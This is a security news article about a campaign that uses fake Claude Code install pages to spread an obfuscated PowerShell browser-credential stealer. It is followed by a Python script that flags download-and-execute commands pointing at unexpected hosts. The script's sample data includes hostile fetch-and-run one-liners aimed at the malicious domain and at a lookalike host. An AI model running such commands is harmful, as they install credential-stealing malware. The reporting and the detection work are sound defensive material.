Fake Claude Code Installer Targets Developers With Browser Credential Stealer
hackread.com
Researchers at Ontinue have discovered an undocumented malware campaign targeting developers with fake Claude Code installers to steal browser passwords and cookies.
A new report from the Cyber Defence Centre at Ontinue has found a campaign targeting software developers with fake installation pages that look like official sites for AI tools like Claude Code.
The attack begins when a user searches for ‘install Claude code’ and clicks on a sponsored result. This link goes to a lookalike page that shows an installation command. While the real command uses the host ‘claude.ai,’ the fake version uses ‘events.msft23.com.’
Running this command uses Invoke-RestMethod to download a 600 KB, heavily obfuscated PowerShell script. This loader first checks the Windows region settings and stops immediately if the host is located in countries like Russia, Iran, or Ukraine.
But, if the location is not on the list, the malware searches for Chromium-family ...
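The following is an added example, not code from the Ontinue report or from the article. It is a triage check for the substitution described above, where the install one-liner fetches from events.msft23.com instead of claude.ai. The sample command lines, their paths, and the `EXPECTED_HOSTS` allowlist are constructed assumptions.

```python
import re
from urllib.parse import urlsplit

# Host the page gives for the real install command.
EXPECTED_HOSTS = {"claude.ai"}

# PowerShell download and execute cmdlets with their built-in aliases.
DOWNLOAD = re.compile(r"\b(invoke-restmethod|irm|invoke-webrequest|iwr)\b", re.I)
EXECUTE = re.compile(r"\b(invoke-expression|iex)\b", re.I)
URL = re.compile(r"https?://[^\s'\"|)]+", re.I)


def url_host(url):
    """Parsed hostname of a URL, or '' if it cannot be parsed."""
    try:
        return (urlsplit(url).hostname or "").rstrip(".")
    except ValueError:
        return ""


def host_allowed(host, allowed=EXPECTED_HOSTS):
    """Exact or subdomain match only; a substring test would pass lookalikes."""
    return any(host == a or host.endswith("." + a) for a in allowed)


def triage(command_line):
    """None if the line is not download-and-execute, else (verdict, hosts)."""
    if not (DOWNLOAD.search(command_line) and EXECUTE.search(command_line)):
        return None
    hosts = [url_host(u) for u in URL.findall(command_line)]
    unexpected = [h for h in hosts if not host_allowed(h)]
    if unexpected or not hosts:
        return ("suspicious", unexpected)
    return ("ok", hosts)


# Constructed sample command lines (paths are placeholders, not from the report).
SAMPLE = [
    'powershell -c "irm https://claude.ai/install.ps1 | iex"',
    'powershell -c "irm https://events.msft23.com/PLACEHOLDER | iex"',
    'powershell -c "Invoke-RestMethod https://claude.ai.example.invalid/x | Invoke-Expression"',
    "git clone https://github.com/example/repo.git",
]

if __name__ == "__main__":
    for line in SAMPLE:
        print(triage(line), "<-", line)
```

The same function can be run over process command lines or PowerShell script block log text exported from endpoint telemetry; a download-and-execute line with no parseable URL is also returned as suspicious.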
Copyright of this story solely belongs to hackread.com.

